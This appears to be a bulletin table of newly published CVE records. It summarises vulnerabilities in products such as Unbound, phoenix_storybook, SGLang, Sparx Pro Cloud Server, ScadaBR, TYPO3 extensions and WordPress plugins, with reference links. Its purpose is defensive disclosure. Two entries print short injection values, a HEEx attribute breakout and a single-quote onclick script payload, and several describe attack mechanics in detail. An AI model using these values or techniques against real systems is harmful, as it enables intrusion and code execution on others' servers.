| NLnet Labs--Unbound | NLnet Labs Unbound 1.14.0 up to and including version 1.25.0 has a locking inconsistency vulnerability that when certain conditions are met (multi-threaded, RPZ XFR reload, RPZ zone with 'rpz-nsip'/'rpz-nsdname' triggers) it could result in heap use-after-free and eventual crash. An adversary can exploit the vulnerability if conditions are first met on a vulnerable Unbound, i.e., multi-threaded, an RPZ zone with 'rpz-nsip'/'rpz-nsdname' triggers and an ongoing XFR for that RPZ zone. Local RPZ files do not trigger the vulnerability. If the timing is right and an XFR happens at the same time another thread needs to read that RPZ zone, the reader may not hold the lock long enough and the thread applying the XFR may free objects that the reader is about to walk causing the use-after-free. Unbound 1.25.1 contains a patch with a fix to the locking code. | 2026-05-20 | not yet calculated | CVE-2026-44608 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-44608.txt |
| NOVUS--AirGate 4G | Incorrect access control in the /uci/get/ endpoint of NOVUS AirGate 4G firmware v1.1.16 allows unauthenticated attackers to obtain administrator credentials via a crafted POST request. | 2026-05-18 | not yet calculated | CVE-2023-24215 | http://airgate.com http://novus.com https://github.com/sql3t0/cve-disclosures/blob/main/00_-_CVE-2023-24215.md |
| Offline Hospital Management System--Offline Hospital Management System 5.3.0 | Offline Hospital Management System 5.3.0 allows remote code execution due to an improper Electron renderer configuration. The application enables Node.js integration while disabling context isolation, allowing JavaScript executed in the renderer process to access Node.js APIs and execute arbitrary operating system commands. | 2026-05-18 | not yet calculated | CVE-2026-26462 | https://sourceforge.net/projects/hospital-management-system/files/ https://medium.com/@husaainpalh/remote-code-execution-in-offline-hospital-management-system-cve-2026-26462-bc7ac54314c4 |
| OpENer--OpENer v2.3-558-g1e99582 | OpENer v2.3-558-g1e99582 contains an out-of-bounds read vulnerability in the Common Packet Format (CPF) parser, specifically in CreateCommonPacketFormatStructure() in source/src/enet_encap/cpf.c. A crafted ENIP/CPF message can supply an attacker-controlled item_count value that is not consistently validated against the remaining data_length of the CPF slice. | 2026-05-18 | not yet calculated | CVE-2026-38719 | https://github.com/EIPStackGroup/OpENer https://github.com/EIPStackGroup/OpENer/issues/558 |
| Perforce--P4 (Helix Core) | A Remote Code Execution vulnerability in P4 (Helix Core) Server's Command-Line Client, prior to the 2025.2 Patch 2, has been fixed to address potential security risks. | 2026-05-18 | not yet calculated | CVE-2026-6902 | https://portal.perforce.com/s/cve/a91Qi000002zJB3IAM/code-injection-in-perforce-helix-core |
| phenixdigital--phoenix_storybook | Authorization Bypass Through User-Controlled Key vulnerability in phenixdigital phoenix_storybook allows cross-session PubSub topic injection via a URL query parameter. 'Elixir.PhoenixStorybook.Story.ComponentIframeLive':handle_params/3 in lib/phoenix_storybook/live/story/component_iframe_live.ex reads a PubSub topic directly from params["topic"] and broadcasts {:component_iframe_pid, self()} on it with no check that the topic belongs to the requesting session. The shared PhoenixStorybook.PubSub is used to coordinate playground LiveViews with their iframes: a playground subscribes to a session-specific topic and uses the received iframe pid to direct subsequent control messages (variation state, theme switches, extra-assign payloads) via send/2. Because the iframe trusts the query parameter, an attacker who loads /storybook/iframe/<story>?topic=<victim_topic> causes their iframe process pid to be announced on the victim's topic. The victim's playground then addresses its private messages to the attacker's iframe process. This issue affects phoenix_storybook from 0.4.0 before 1.1.0. | 2026-05-20 | not yet calculated | CVE-2026-47068 | https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-mrhx-6pw9-q5fh https://cna.erlef.org/cves/CVE-2026-47068.html https://osv.dev/vulnerability/EEF-CVE-2026-47068 https://github.com/phenixdigital/phoenix_storybook/commit/6ee03f1c738d4436dde1b066cf65c80663d489f5 |
| phenixdigital--phoenix_storybook | Code Injection vulnerability in phenixdigital phoenix_storybook allows unauthenticated remote code execution via unsanitized attribute value interpolation in HEEx template generation. The psb-assign WebSocket event handler in 'Elixir.PhoenixStorybook.Story.PlaygroundPreviewLive':handle_event/3 accepts arbitrary attribute names and values from unauthenticated clients. These values are passed to 'Elixir.PhoenixStorybook.Helpers.ExtraAssignsHelpers':handle_set_variation_assign/3, which stores them verbatim. When rendering, 'Elixir.PhoenixStorybook.Rendering.ComponentRenderer':attributes_markup/1 interpolates binary attribute values directly into a HEEx template string as name="<val>" without escaping double quotes or HEEx expression delimiters. An attacker can supply a value containing a closing quote followed by a HEEx expression block (e.g. foo" injected={EXPR} bar="), which causes EXPR to be treated as an inline Elixir expression. The resulting template is compiled via EEx.compile_string/2 and executed via Code.eval_quoted_with_env/3 with full Kernel imports and no sandbox, giving the attacker arbitrary code execution on the server. This issue affects phoenix_storybook from 0.5.0 before 1.1.0. | 2026-05-20 | not yet calculated | CVE-2026-8467 | https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-55hg-8qxv-qj4p https://cna.erlef.org/cves/CVE-2026-8467.html https://osv.dev/vulnerability/EEF-CVE-2026-8467 https://github.com/phenixdigital/phoenix_storybook/commit/56ab8464d4375fa52db806148a06cce126ad481d |
| phenixdigital--phoenix_storybook | Allocation of Resources Without Limits or Throttling vulnerability in phenixdigital phoenix_storybook allows unauthenticated denial-of-service via BEAM atom table exhaustion. Multiple LiveView event handlers convert user-supplied event parameter strings to atoms using String.to_atom/1 without validation: 'Elixir.PhoenixStorybook.ExtraAssignsHelpers':handle_set_variation_assign/3 interns every key of the psb-assign params map; 'Elixir.PhoenixStorybook.ExtraAssignsHelpers':handle_toggle_variation_assign/3 interns the "attr" value from psb-toggle events; 'Elixir.PhoenixStorybook.ExtraAssignsHelpers':to_variation_id/2 interns elements of "variation_id"; and 'Elixir.PhoenixStorybook.ExtraAssignsHelpers':to_value/4 interns raw string values for attributes declared as :atom or :boolean. BEAM atoms are never garbage-collected, so each unique attacker-controlled string is a permanent allocation. Once the atom table ceiling (~1,048,576 atoms) is reached, the entire BEAM node aborts, taking down all applications running on it. This issue affects phoenix_storybook from 0.2.0 before 1.1.0. | 2026-05-20 | not yet calculated | CVE-2026-8469 | https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-833p-95jq-929q https://cna.erlef.org/cves/CVE-2026-8469.html https://osv.dev/vulnerability/EEF-CVE-2026-8469 https://github.com/phenixdigital/phoenix_storybook/commit/96d524690af0fe197a49f60d18e564a620b9ef81 |
| prefecthq--prefecthq/prefect | A vulnerability in the `GitHubRepository` block of the `prefect-github` integration in Prefect version 3.6.18 allows an attacker to inject arbitrary git command-line options via the `reference` field. The `reference` field is concatenated directly into a `git clone` command string without proper sanitization, and then parsed by `shlex.split()`. This enables injection of options such as `-c`, leading to potential Server-Side Request Forgery (SSRF), credential theft, or remote code execution (RCE). The vulnerability affects both the `aget_directory()` and `get_directory()` methods in `src/integrations/prefect-github/prefect_github/repository.py`. This issue does not affect the GitLab and BitBucket integrations, which use a safer list-based command construction approach. | 2026-05-24 | not yet calculated | CVE-2026-3515 | https://huntr.com/bounties/f3b048b8-7f4e-45ef-a5a7-cb841c39acde |
| PrestaShop--upsshipping module | An issue in PrestaShop upsshipping, all versions through at least 2.4.0, allows a remote attacker to obtain sensitive information via the /modules/upsshipping/logs/ and /modules/upsshipping/lib/UPSBaseApi.php components. | 2026-05-18 | not yet calculated | CVE-2026-39079 | https://labs.esokia.com/cve/cve-2026-39079/ |
| Rocket.Chat--Rocket.Chat | The /api/v1/autotranslate.translateMessage endpoint in versions <8.5.0, <8.4.2, <8.3.4, <8.2.4, <8.1.5, <8.0.6, <7.13.8, and <7.10.12 allows any authenticated user to retrieve the full content of any message from any room (private groups, direct messages, channels) by simply providing the target message ID. The endpoint fetches the message via Messages.findOneById(messageId) with no room access check (canAccessRoomIdAsync is never called), returning the complete IMessage object including message text, sender info, room ID, timestamps, and markdown content. | 2026-05-19 | not yet calculated | CVE-2026-32994 | https://hackerone.com/reports/3713682 |
| RRWO--Crypt::SaltedHash | Crypt::SaltedHash versions through 0.09 for Perl generate insecure random values for salts. These versions use the built-in rand function, which is predictable and unsuitable for cryptography. | 2026-05-20 | not yet calculated | CVE-2026-47372 | https://metacpan.org/release/RRWO/Crypt-SaltedHash-0.10/changes https://github.com/robrwo/perl-Crypt-SaltedHash/commit/9b68437d2cd420b819b3a795474c3870338d38d5.patch |
| RRWO--Crypt::SaltedHash | Crypt::SaltedHash versions through 0.09 for Perl are susceptible to timing attacks. These versions use Perl's built-in eq comparison. Discrepancies in timing could be used to guess the underlying hash. | 2026-05-20 | not yet calculated | CVE-2026-47373 | https://metacpan.org/release/RRWO/Crypt-SaltedHash-0.10/changes https://github.com/robrwo/perl-Crypt-SaltedHash/commit/c07bfc5c23185b0667233d0f2e1252d81f1f027a.patch |
| RRWO--Net::Statsd::Lite | Net::Statsd::Lite versions through 0.10.0 for Perl allowed metric injections. The values from the set_add method were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics. Note that version 0.9.0 fixed a similar issue CVE-2026-46719 for metric names. | 2026-05-18 | not yet calculated | CVE-2026-8788 | https://metacpan.org/release/RRWO/Net-Statsd-Lite-v0.10.1/changes https://www.cve.org/CVERecord?id=CVE-2026-46719 |
| ScadaBR--ScadaBR | In ScadaBR version 1.2.0, a Missing Authentication for Critical Function vulnerability could allow an unauthenticated attacker to send HTTP GET requests to the SCADA system and inject arbitrary sensor readings. | 2026-05-19 | not yet calculated | CVE-2026-8602 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03 |
| ScadaBR--ScadaBR | In ScadaBR version 1.2.0, an OS Command Injection vulnerability could allow an attacker to execute commands as root on the SCADA system. | 2026-05-19 | not yet calculated | CVE-2026-8603 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03 |
| ScadaBR--ScadaBR | In ScadaBR version 1.2.0, a CSRF vulnerability could allow an attacker to trigger any authenticated action through a victim's session by luring any logged-in user to a malicious webpage. | 2026-05-19 | not yet calculated | CVE-2026-8604 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03 |
| ScadaBR--ScadaBR | In ScadaBR version 1.2.0, a Use of Hard-Coded Credentials vulnerability could allow an attacker to access the SCADA system as admin. | 2026-05-19 | not yet calculated | CVE-2026-8605 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-03 |
| scalar--astro v0.1.13 | scalar/astro v0.1.13 was discovered to contain an arbitrary file upload vulnerability in the scalar_url query parameter of the Scalar Proxy endpoint. This vulnerability allows attackers to execute arbitrary code via uploading a crafted SVG file. | 2026-05-19 | not yet calculated | CVE-2026-30117 | https://github.com/prassan10/XSS-Open-Redirect-via-scalar_url |
| scalar--astro v0.1.13 | scalar/astro v0.1.13 was discovered to contain a Server-Side Request Forgery (SSRF) in the scalar_url query parameter of the Scalar Proxy endpoint. This vulnerability allows unauthenticated attackers to force the backend server to send HTTP requests to attacker-controlled URLs, leading to authentication cookies and headers exposure and possible privilege escalation. | 2026-05-19 | not yet calculated | CVE-2026-30118 | https://github.com/prassan10/ssrf-zero-click-ato-scalar |
| SGLang--SGLang | SGLang's multimodal generation runtime scheduler's ROUTER socket binds to 0.0.0.0 by default and contains a sink that calls pickle.loads() on incoming messages, enabling RCE when exposed to the internet. | 2026-05-18 | not yet calculated | CVE-2026-7301 | https://github.com/sgl-project/sglang/tree/main/python/sglang https://antiproof.ai/blog/three-rces-in-sglang/ |
| SGLang--SGLang | SGLang's multimodal generation runtime is vulnerable to an unauthenticated path traversal vulnerability, allowing an attacker to write arbitrary files anywhere the server process has write access, by including ../ sequences in the upload filename when sent to specific endpoints. | 2026-05-18 | not yet calculated | CVE-2026-7302 | https://github.com/sgl-project/sglang/tree/main/python/sglang https://antiproof.ai/blog/three-rces-in-sglang/ |
| SGLang--SGLang | SGLang's multimodal generation runtime is vulnerable to unauthenticated remote code execution when the --enable-custom-logit-processor option is enabled, as Python objects loaded via dill.loads() are deserialized without validation. | 2026-05-18 | not yet calculated | CVE-2026-7304 | https://github.com/sgl-project/sglang/tree/main/python/sglang https://antiproof.ai/blog/three-rces-in-sglang/ |
| Siber Systems, Inc.--Android App "RoboForm Password Manager" | Android App "RoboForm Password Manager" provided by Siber Systems, Inc. handles Android intents without sufficient URL validation, user confirmation, or notification. If a URL to some malicious web page is given through an intent, RoboForm may silently download files without user confirmation or notification. | 2026-05-20 | not yet calculated | CVE-2026-47782 | https://play.google.com/store/apps/details?id=com.siber.roboform https://www.roboform.com/news-android https://jvn.jp/en/vu/JVNVU93461473/ |
| simplesamlphp--simplesamlphp-module-casserver | SimpleSAMLphp-casserver is a CAS 1.0 and 2.0 compliant CAS server in the form of a SimpleSAMLphp module. In versions below 6.3.1 and 7.0.0, the logout endpoint accepts a url query parameter to redirect to. casserver treats that url as trusted, and either (depending on configuration) redirects the browser there, or shows a "you've been logged out" page with a link to continue to that url. Impacted configs include 'enable_logout' => true and 'skip_logout_page' => true. This issue has been resolved in versions 6.3.1 and 7.0.0. | 2026-05-18 | not yet calculated | CVE-2025-65954 | https://github.com/simplesamlphp/simplesamlphp-module-casserver/security/advisories/GHSA-cvrm-5hp6-h523 https://github.com/simplesamlphp/simplesamlphp-module-casserver/commit/0462f50f00b3bb300d83067d11b74146a57bb8e0 https://github.com/simplesamlphp/simplesamlphp-module-casserver/commit/fb6c6f1c7b9e757c93c5c306e1d36405e64f6dc5 |
| Six Apart Ltd.--Movable Type | Missing authorization vulnerability exists in Movable Type. Under certain conditions, when a user without administrator privileges signs in to the product, unintended update processing may be executed. | 2026-05-20 | not yet calculated | CVE-2026-44392 | https://movabletype.org/news/2026/05/mt-908-released.html https://www.sixapart.jp/movabletype/news/2026/05/20-1100.html https://jvn.jp/en/jp/JVN66473735/ |
| Sparx Systems--Enterprise Architect | Sparx Enterprise Architect software has a security feature that limits a user's actions to those specified in their role. An authenticated attacker can modify the Enterprise Architect client behavior (e.g. using a debugger) and log in as any other user or administrator, after which any change to the repository is possible. The vendor was notified early about this vulnerability, but didn't respond with the details of the vulnerability or the vulnerable version range. Only version 17.1 and below were tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42098 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/ea/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| Sparx Systems--Pro Cloud Server | Sparx Pro Cloud Server is vulnerable to Broken Access Control within communication with the database. Due to lack of permission checks, any low privileged user can run arbitrary SQL queries within database user context. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42096 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/procloudserver/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| Sparx Systems--Pro Cloud Server | Sparx Pro Cloud Server requires authentication based on requested URL. An attacker can omit the "model" query parameter and send the model name only in the binary blob in POST request allowing SQL query execution without authentication. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42097 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/procloudserver/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| Sparx Systems--Pro Cloud Server | Sparx Pro Cloud Server is vulnerable to a Race Condition in the /data_api/dl_internal_artifact.php endpoint. The application downloads the properties of the object pointed by guid parameter and saves loaded content in current location (__DIR__) under the specified name. An attacker with repository access can control both the filename and file contents, allowing the creation of a malicious PHP file in a current directory. Although the file is deleted after processing, a race condition exists: if the response transmission is delayed (e.g., via a large file or slow client connection), the file remains accessible. During this window, the attacker can issue a second request to execute the malicious PHP file, resulting in remote code execution. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42099 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/procloudserver/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| Sparx Systems--Pro Cloud Server | Improper Handling of Syntactically Invalid Structure in Sparx Pro Cloud Server allows a Denial of Service (DoS) attack to be executed by sending a specially crafted SQL query. This causes the Pro Cloud Server service to terminate unexpectedly. The vendor was notified early about this vulnerability, but didn't respond with the details of the vulnerability or the vulnerable version range. Only version 6.1 (build 167) and below were tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable. | 2026-05-19 | not yet calculated | CVE-2026-42100 | https://cert.pl/en/posts/2026/05/CVE-2026-42096 https://sparxsystems.com/products/procloudserver/ https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html https://efigo.pl/blog/CVE-2026-42096/ |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and prior, a crafted HEIF sequence file where the saiz box declares more samples than actually exist in the track's chunk table causes a heap-buffer-overflow (out-of-bounds read) in the SampleAuxInfoReader constructor. The SampleAuxInfoReader constructor iterates over saiz->get_num_samples() samples but doesn't validate that this count is consistent with the number of chunks in the chunks vector. When saiz declares more samples than the chunks cover, the loop increments current_chunk past chunks.size(), causing an out-of-bounds read on the chunks vector. The vulnerability is triggered during file parsing (heif_context_read_from_file) without any additional user interaction. Any application using libheif to open untrusted HEIF files is affected. This issue has been fixed in version 1.22.0. | 2026-05-22 | not yet calculated | CVE-2026-41071 | https://github.com/strukturag/libheif/security/advisories/GHSA-xj92-xjff-h8w3 https://github.com/strukturag/libheif/releases/tag/v1.22.0 |
| TCHATZI--Authen::TOTP | Authen::TOTP versions before 0.1.1 for Perl generate secrets using rand. Secrets were generated using Perl's built-in rand function, which is predictable and unsuitable for security usage. | 2026-05-21 | not yet calculated | CVE-2026-46473 | https://metacpan.org/release/TCHATZI/Authen-TOTP-0.1.1/changes https://github.com/tchatzi/Authen-TOTP/commit/d04f30cc6538d77fc6b6d550da450cf3017b8561.patch |
| The Qt Company--Qt | An Uncontrolled Search Path Element vulnerability in the OpenSSL TLS backend of Qt Network (qtbase) in Qt Qt Framework (Unix) allows a local attacker to load a rogue CA certificate as a trusted system authority via a crafted certificate file placed in the application's working directory. | 2026-05-19 | not yet calculated | CVE-2025-14575 | Gerrit: QSslCertificate::fromPath — reject empty path strings (Qt 6.9.2+) |
| Thermo Fisher--Scientific Torrent Suite Dx | Thermo Fisher Scientific Torrent Suite Dx through 5.14.2 has a privilege escalation vulnerability that may allow an authenticated user with limited access privileges to gain unauthorized administrator-level privileges through exploitation of specific system interfaces. | 2026-05-18 | not yet calculated | CVE-2026-41085 | https://thermofisher.com https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/TorrentSuiteDxSoftware_v5_14_2.pdf |
| tinyMQTT--tinyMQTT | In tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962 (2024-02-18), the broker mishandles protocol violations during CONNECT packet parsing. When receiving a CONNECT packet with a zero-length Client ID while CleanSession is set to 0, the broker correctly replies with a CONNACK return code 0x02 (Identifier Rejected) but fails to explicitly close the TCP connection. Since the surrounding connection teardown logic is not guaranteed to execute, each such invalid CONNECT attempt leaves the underlying socket open. Repeated attempts cause server-side resource exhaustion due to accumulating file descriptors and memory usage, potentially resulting in denial of service. | 2026-05-18 | not yet calculated | CVE-2025-56352 | https://github.com/JustDoIt0910/tinyMQTT/issues/19 |
| TODDR--Template::Plugin::HTML | Template::Plugin::HTML versions through 3.102 for Perl allow HTML and JavaScript to be injected. The html_filter function did not escape single quotes, so HTML attributes enclosed in single quotes could have code injected. For example, the variable "var" in <a id='ref' title='[% var | html %]'> would not be properly escaped. An attacker could insert some limited HTML and JavaScript, for example, var = " ' onclick='while (true) { alert(1) }'". Note that arbitrary HTML and JavaScript would be difficult to inject, because angle brackets, ampersands and double quotes would still be escaped. | 2026-05-19 | not yet calculated | CVE-2026-5090 | https://github.com/abw/Template2/issues/327 https://github.com/abw/Template2/pull/337/changes/11c78a7a771d4af505efeb754a0b8775689c2eae |
| TP-Link Systems Inc.--Archer AX72 (SG) v1.0 | In the web management interface of Archer AX72 (SG) v1, the network diagnostic feature improperly handles invalid user input, resulting in limited exposure of diagnostic command usage information. An authenticated attacker with administrative privileges could exploit this issue to confirm the presence of the diagnostic utility and view its valid command-line syntax and options. The exposed information is limited in scope and does not include sensitive system data. | 2026-05-19 | not yet calculated | CVE-2026-5511 | https://www.tp-link.com/sg/support/download/archer-ax72/#Firmware https://www.tp-link.com/us/support/faq/5096/ |
| TP-Link Systems Inc.--Archer RE650 v1 | An authentication logic vulnerability in multiple TP-Link range extenders allows an unauthenticated attacker on an adjacent network to manipulate a login parameter and reset the administrator password due to insufficient validation. Successful exploitation allows an attacker to obtain full administrative control of the affected device, potentially impacting on confidentiality, integrity, and availability. | 2026-05-22 | not yet calculated | CVE-2026-3294 | https://www.tp-link.com/en/support/download/re650/v1/#Firmware https://www.tp-link.com/us/support/download/re650/v1/#Firmware https://www.tp-link.com/us/support/download/re305/v1/#Firmware https://www.tp-link.com/en/support/download/re305/v1/#Firmware https://www.tp-link.com/us/support/download/re360/v1/#Firmware https://www.tp-link.com/en/support/download/re360/v1/#Firmware https://www.tp-link.com/us/support/download/tl-wa860re/v4/#Firmware https://www.tp-link.com/en/support/download/tl-wa860re/v4/#Firmware https://www.tp-link.com/en/support/download/re580d/#Firmware https://www.tp-link.com/us/support/download/re580d/#Firmware https://www.tp-link.com/us/support/faq/5101/ |
| Trend Micro, Inc.--TrendAI Apex One (Mac) | An origin validation error vulnerability in the Trend Micro Apex One (mac) agent iCore service could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). | 2026-05-21 | not yet calculated | CVE-2025-71214 | https://success.trendmicro.com/en-US/solution/KA-0022458 https://www.zerodayinitiative.com/advisories/ZDI-26-139/ |
| Trend Micro, Inc.--TrendAI Apex One (Mac) | A time-of-check time-of-use vulnerability in the Trend Micro Apex One (mac) agent iCore service signature verification could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). | 2026-05-21 | not yet calculated | CVE-2025-71215 | https://success.trendmicro.com/en-US/solution/KA-0022458 https://www.zerodayinitiative.com/advisories/ZDI-26-141/ |
| Trend Micro, Inc.--TrendAI Apex One (Mac) | A time-of-check time-of-use vulnerability in the Trend Micro Apex One (mac) agent cache mechanism could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). | 2026-05-21 | not yet calculated | CVE-2025-71216 | https://success.trendmicro.com/en-US/solution/KA-0022458 https://www.zerodayinitiative.com/advisories/ZDI-26-142/ |
| Trend Micro, Inc.--TrendAI Apex One (Mac) | An origin validation error vulnerability in the Trend Micro Apex One (mac) agent self-protection mechanism could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The following information is provided as informational only for CVE references, as these were addressed already via ActiveUpdate/SaaS updates in mid to late 2025 (SaaS 2507 & 2005 Yearly Release). | 2026-05-21 | not yet calculated | CVE-2025-71217 | https://success.trendmicro.com/en-US/solution/KA-0022458 https://www.zerodayinitiative.com/advisories/ZDI-26-143/ |
| Trimble--SketchUp | A cross-site scripting (XSS) vulnerability in SketchUp 2026's Dynamic Components feature allows remote code execution and local file exfiltration through maliciously crafted SKP files. The vulnerability stems from improper input sanitization in the component options window, enabling attackers to execute arbitrary system commands and read local files without user interaction by exploiting an embedded Internet Explorer 11 browser. | 2026-05-22 | not yet calculated | CVE-2026-9264 | https://trust.trimble.com/?tcuUid=52252bc0-c196-4b1f-9f13-4e4c9ba247d9 |
| TYPO3--Extension "Address List" | The AddressRepository::getSqlQuery() method constructs a database query without properly sanitizing user input, leading to SQL Injection. The method is not invoked anywhere within the extension itself and therefore poses no direct risk in a default installation. However, custom extensions that call this method with untrusted input would expose the site to SQL injection. | 2026-05-19 | not yet calculated | CVE-2026-8827 | https://typo3.org/security/advisory/typo3-ext-sa-2026-012 |
| TYPO3--Extension "Content Element Selector" | The extension passes an attacker-controlled cookie directly to PHP's unserialize() without safely processing the input. A remote, unauthenticated attacker can supply a crafted serialized payload to trigger PHP Object Injection, leading to Remote Code Execution on the TYPO3 server. Exploitation requires the content element to be configured with "Persistent Mode: Static" in the plugin settings. | 2026-05-19 | not yet calculated | CVE-2026-46725 | https://typo3.org/security/advisory/typo3-ext-sa-2026-013 |
| TYPO3--Extension "Faceted Search" | The OOXML parsing of the file indexer does not disable external entity resolution. A crafted xlsx or pptx document placed in an indexed directory can cause local files to be read or outbound HTTP requests to be performed, with the retrieved content being written to the search index. | 2026-05-19 | not yet calculated | CVE-2026-46722 | https://typo3.org/security/advisory/typo3-ext-sa-2026-011 |
| TYPO3--Extension "Faceted Search" | The additional_tables configuration of the page and tt_content indexers accepts arbitrary table and field names. A backend user with permission to edit indexer configurations can copy sensitive data from internal TYPO3 tables into the search index. | 2026-05-19 | not yet calculated | CVE-2026-46723 | https://typo3.org/security/advisory/typo3-ext-sa-2026-011 |
| TYPO3--Extension "Faceted Search" | The file indexer does not normalize the configured directory path. A backend user with permission to edit indexer configurations can index documents from arbitrary locations on the server file system through path traversal sequences. | 2026-05-19 | not yet calculated | CVE-2026-46724 | https://typo3.org/security/advisory/typo3-ext-sa-2026-011 |
| TYPO3--Extension "Frontend User Registration" | The create and edit flows do not restrict which user properties may be submitted and do not enforce access control on the frontend user group assignment. As a result, an attacker can assign an arbitrary frontend user group to a newly registered or edited account, gaining unauthorized access to content and functionality restricted to privileged frontend user groups. | 2026-05-19 | not yet calculated | CVE-2026-46721 | https://typo3.org/security/advisory/typo3-ext-sa-2026-009 |
| TYPO3--Extension "News system" | The extension fails to properly sanitize user input before using it in a database query. As a result, an unauthenticated attacker can inject arbitrary SQL through a URL parameter on pages using the "Date Menu of news articles" plugin. Exploitation requires the "Date Menu of news articles" plugin to be in use and the TypoScript/Plugin setting disableOverrideDemand not to be enabled. | 2026-05-19 | not yet calculated | CVE-2026-8726 | https://typo3.org/security/advisory/typo3-ext-sa-2026-010 |
| TYPO3--Extension "Site Crawler" | The Crawler extension passes the X-T3Crawler-Meta response header from crawled URLs directly to PHP's unserialize(). An attacker controlling a crawled endpoint can inject arbitrary serialized PHP objects, leading to Remote Code Execution on the TYPO3 server. Exploitation requires administrative privileges to configure a crawler-enabled page and trigger the crawl via a Scheduler task. | 2026-05-19 | not yet calculated | CVE-2026-8727 | https://typo3.org/security/advisory/typo3-ext-sa-2026-008 |
| Unknown--Ajax Load More | The Ajax Load More WordPress plugin before 7.8.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin | 2026-05-18 | not yet calculated | CVE-2026-6495 | https://wpscan.com/vulnerability/c52f28c5-547d-48ae-89dd-edcdaeadcec5/ |
| Unknown--Autoptimize | The Autoptimize WordPress plugin before 3.1.15, Clearfy Cache WordPress plugin before 2.4.2, Speed Optimizer WordPress plugin before 7.7.9 are vulnerable to unauthenticated Stored Cross-Site Scripting (XSS) due to a predictable replacement hash used during the HTML minification process and abusing a regular expression. This allows an attacker to inject arbitrary HTML attributes in the final HTML output by anticipating the placeholder format. | 2026-05-18 | not yet calculated | CVE-2026-3220 | https://wpscan.com/vulnerability/3ceabf11-23cd-4c38-ba14-014348b0ff2d/ |
| Unknown--Decent Comments | The Decent Comments WordPress plugin before 3.0.2 does not restrict access to comment author email addresses and post author email addresses via its REST API endpoint, allowing unauthenticated attackers to enumerate registered user email addresses. | 2026-05-20 | not yet calculated | CVE-2026-7385 | https://wpscan.com/vulnerability/1c5949d0-cf50-45d3-a7e2-2f94cdb42405/ |
| Unknown--Email Encoder | The Email Encoder WordPress plugin before 2.4.7 does not escape email addresses retrieved via user input, allowing unauthenticated attackers to perform Stored XSS attacks | 2026-05-20 | not yet calculated | CVE-2026-5776 | https://wpscan.com/vulnerability/00c0b9f7-c559-463e-80ae-97d99e0ef99f/ |
| Unknown--Feeds for YouTube (YouTube video, channel, and gallery plugin) | The Feeds for YouTube (YouTube video, channel, and gallery plugin) WordPress plugin before 2.6.4 is vulnerable to unauthorized modification of its license key due to a missing capability check on the 'actions' function. This makes it possible for users with the subscriber role and above to delete the license key. | 2026-05-18 | not yet calculated | CVE-2026-1631 | https://wpscan.com/vulnerability/b19596c2-69bc-4e15-8632-eb80f4577e3c/ |
| Unknown--Fortis for WooCommerce | The Fortis for WooCommerce WordPress plugin before 1.3.1 may leak sensitive API keys to unauthenticated attackers, allowing them to query Fortis' API and retrieve sensitive customer information, like past orders, PII, etc. | 2026-05-19 | not yet calculated | CVE-2025-15609 | https://wpscan.com/vulnerability/220f72ea-e3b4-44c9-8c9b-15662aebb6cb/ |
